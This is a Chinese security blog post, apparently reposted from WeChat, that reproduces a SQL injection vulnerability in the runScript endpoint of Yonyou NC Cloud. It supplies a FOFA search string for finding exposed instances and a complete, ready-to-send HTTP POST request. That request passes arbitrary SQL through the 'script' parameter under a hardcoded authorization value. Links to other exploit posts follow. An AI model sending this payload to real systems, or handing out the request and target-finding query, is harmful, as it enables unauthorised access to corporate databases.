【漏洞复现】用友NC Cloud系统runScript存在SQL注入漏洞

admin

102423
文章

87
评论

2024年3月20日13:50:09评论65 views字数 546阅读1分49秒阅读模式

免责声明

漏洞描述

用友NC Cloud系统runScript存在SQL注入漏洞，攻击者未经授权可以访问数据库中的数据。

资产测绘

FOFA：app="用友-NC-Cloud"

漏洞复现

POST /ncchr/attendScript/internal/runScript HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Content-Length: 59
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Authorization: 58e00466213416018d01d15de83b0198
Connection: close
Content-Type: application/x-www-form-urlencoded

key=1&script=select 1,111*111,USER,4,5,6,7,8,9,10 from dual

原文始发于微信公众号（漏洞文库）：【漏洞复现】用友NC Cloud系统runScript存在SQL注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】用友NC Cloud系统runScript存在SQL注入漏洞

免责声明

漏洞复现

漏洞通告 | 禅道项目管理系统权限提升漏洞

禅道项目管理系统身份认证绕过漏洞

Windows 打印后台处理程序存在缺陷

禅道身份认证绕过漏洞 QVD-2024-15263

通达OA down.php 存在信息泄露漏洞

某质量监测系统rce漏洞附POC

【漏洞复现】湖南建研工程质量检测系统upload.ashx接口处存在文件上传漏洞

二次注入简单介绍

CVE-2024-2389 命令执行漏洞(附EXP)

CVE-2024-4040 CrushFTP 中的身份验证绕过和任意文件读取

发表评论

在线咨询

微信